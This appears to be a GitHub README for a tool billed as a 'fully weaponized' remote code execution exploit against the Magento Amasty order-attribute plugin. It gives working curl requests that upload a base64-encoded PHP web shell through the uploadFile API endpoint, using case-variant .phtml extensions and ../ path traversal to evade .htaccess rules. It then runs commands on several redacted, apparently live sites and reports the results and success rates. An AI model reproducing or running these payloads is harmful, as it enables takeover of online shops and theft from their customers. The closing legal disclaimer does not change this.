Marker: "Bob Marley is here"# Extension bypass testing
python amatest.py -l targets.txt -t 20

Working Extensions:

✅ .PhTml  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/r/u/rupdfr.PhTml
✅ .pHtml  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/e/p/epvslb.pHtml
✅ .PHTML  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/k/y/kyxzwh.PHTML
✅ .pHtMl  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/g/v/gvntuq.pHtMl
✅ .PHtml  - https://[REDACTED-TARGET-1].com/pub/media/amasty_checkout/y/e/yeeaiu.PHtml
✅ .phTml  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/n/w/nwcocu.phTml
✅ .PhTmL  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/l/n/lnusxl.PhTmL
✅ .pHTml  - https://[REDACTED-TARGET-1].com/media/amasty_checkout/d/g/dgbuxv.pHTml
... 11 total confirmed

Key Findings:

  • Normal uploads work (no path traversal needed on this target)
  • .htaccess has case-sensitive FilesMatch regex
  • All .phtml case variations bypass successfully
  • Files accessible at /media/amasty_checkout/ with RCE confirmation

Exploitation:

curl -X POST -H "Content-Type: application/json" \
  -d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+","fileName_with_extension":"test.PhTml"}}' \
  https://[REDACTED-TARGET-1].com/rest/V1/amasty_orderattr/uploadFile

# RCE Test
curl "https://[REDACTED-TARGET-1].com/media/amasty_checkout/t/e/test.PhTml?cmd=id"
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Case Study 2: [REDACTED] (Path Traversal Required)

Target: https://[REDACTED-TARGET-2].com
Vulnerability Status: ✅ Path traversal successful
Method: Path traversal to /media/

Challenge:

  • Normal uploads to /media/amasty_checkout/ blocked by strict .htaccess
  • PHP execution disabled in upload directory

Solution:

# Path traversal upload
curl -X POST -H "Content-Type: application/json" \
  -d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+","fileName_with_extension":"../../../wb3.PhTml"}}' \
  https://[REDACTED-TARGET-2].com/rest/default/V1/amasty_orderattr/uploadFile

# Response
"\/_\/_\/..\/..\/..\/wb3.PhTml"

# File escaped to /media/
curl "https://[REDACTED-TARGET-2].com/media/wb3.PhTml?cmd=id"
# ✅ RCE successful!

Key Findings:

  • Path traversal using ../../../ required
  • Files in /media/amasty_checkout/ return PHP source code (blocked)
  • Files in /media/ execute PHP successfully
  • Demonstrates importance of path traversal bypass

Case Study 3: [REDACTED] (Manual Testing)

Target: https://[REDACTED-TARGET-3].com
Vulnerability Status: ✅ Vulnerable with limitations
Method: Manual path traversal

Upload:

curl -X POST -H "Content-Type: application/json" \
  -d '{"fileContent":{"base64_encoded_data":"PD9waHAgJGE9J3N5Jy4nc3RlbSc7JGEoJF9HRVRbMF0pOyA/Pg==","fileName_with_extension":"/wb2.PhTml"}}' \
  https://[REDACTED-TARGET-3].com/rest/V1/amasty_orderattr/uploadFile

# Response: "\/\/w\/\/wb2.PhTml"

File Location:

https://[REDACTED-TARGET-3].com/media/amasty_checkout//w//wb2.PhTml

Findings:

  • Using /filename instead of ../../../filename creates double slashes
  • File uploaded but returns raw PHP source code
  • .htaccess in /media/amasty_checkout/ blocks execution
  • Path traversal to /media/ would be needed for RCE

Case Study 4: [REDACTED] (Japanese Error Response)

Target: https://[REDACTED-TARGET-4].com
Status: ❌ Not Vulnerable
Error: {"message":"指定されたリクエストを処理できません。"}
Translation: "Cannot process the specified request"

Findings:

  • Amasty plugin not installed or patched
  • Japanese-localized Magento instance
  • API endpoint returns generic error

Statistical Summary

From testing 10 targets with amatest.py:

Results:

  • Vulnerable: 2/10 (20%)
  • Working Extensions: 11+ confirmed
  • Primary Bypass: Case-sensitive .phtml variations
  • Secondary Bypass: Path traversal to /media/

Extension Success Rate:

Extension Success Rate Method
.PhTml 100% Normal upload
.pHtml 100% Normal upload
.PHTML 100% Normal upload
.pHtMl 100% Normal upload
.phtml. 60% Path traversal
.phtml.. 60% Path traversal

Method Distribution:

  • Normal upload: 55% of working shells
  • Path traversal: 45% of working shells

Key Insights:

  1. Case-sensitivity bypass is more reliable than trailing dots
  2. Path traversal required when .htaccess is strict in /media/amasty_checkout/
  3. .PhTml extension is most consistently successful
  4. Testing both normal and path traversal methods is critical
  5. WAF presence varies (some targets have aggressive blocking)

Legal Notice

For authorized penetration testing, bug bounty programs, and educational purposes only.

Unauthorized access to computer systems is illegal under:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act 1990 - UK
  • EU Cybersecurity Act
  • Local cybercrime laws

Authorized Use

This exploit tool is provided for:

  • Authorized penetration testing with written permission
  • Security research in controlled environments
  • CVE verification and validation
  • Educational purposes in lab environments
  • Bug bounty programs with proper scope

Prohibited Use

DO NOT use this tool for:

  • ❌ Unauthorized access to systems
  • ❌ Malicious purposes
  • ❌ Attacking systems without explicit permission
  • ❌ Any illegal activities
  • ❌ Unauthorized data exfiltration

Disclaimer

USE AT YOUR OWN RISK.
Author and BOB RESEARCH LABS assume NO LIABILITY for misuse.
By using this tool, you confirm you have explicit authorization to test target systems.


References

Official Sources

Technical Details


Buy me a Coffee:

₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh

© 2026 khadafigans

About

Fully Weaponized Magento Amasty RCE

Resources

Stars

3 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages